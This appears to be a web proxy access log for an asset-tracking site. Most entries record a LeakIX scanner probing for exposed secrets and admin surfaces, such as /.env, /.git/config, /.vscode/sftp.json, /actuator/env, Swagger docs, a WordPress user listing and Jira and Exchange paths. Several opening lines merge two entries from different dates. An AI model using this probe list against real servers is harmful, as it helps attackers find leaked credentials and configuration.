[14/Feb/2026:23:00:30 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" [19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:00:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" [19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5539] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:31 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" [19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" [19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" [19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" [19/Feb/2026:01:04:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 1846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server-status" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server-status" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:34 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/about" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:35 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/login.action" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:35 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/about" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/_catalog" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:36 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/login.action" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.DS_Store" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/_catalog" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:37 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.DS_Store" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:38 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:39 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:41 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:42 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:42 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/gql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/graphql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:45 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/config.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:45 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/gql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:45 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:46 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/config.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:47 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-"
[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/info.php" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 34.123.170.104] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/telescope/requests" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/info.php" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 34.72.176.129] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:00:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:49 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:50 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/actuator/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:52 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:52 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:53 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:53 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-"
[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:54 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:55 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:55 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:56 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:56 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:57 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:57 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:58 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v3/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:59 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:00:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v3/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:00 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:00 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:01 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/@vite/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:01 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:02 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:02 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/@vite/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:03 +0000] - 502 502 - OPTIONS https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:03 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:04 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:04 +0000] - - 301 - OPTIONS http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:05 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:05 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:06 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:02:40 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
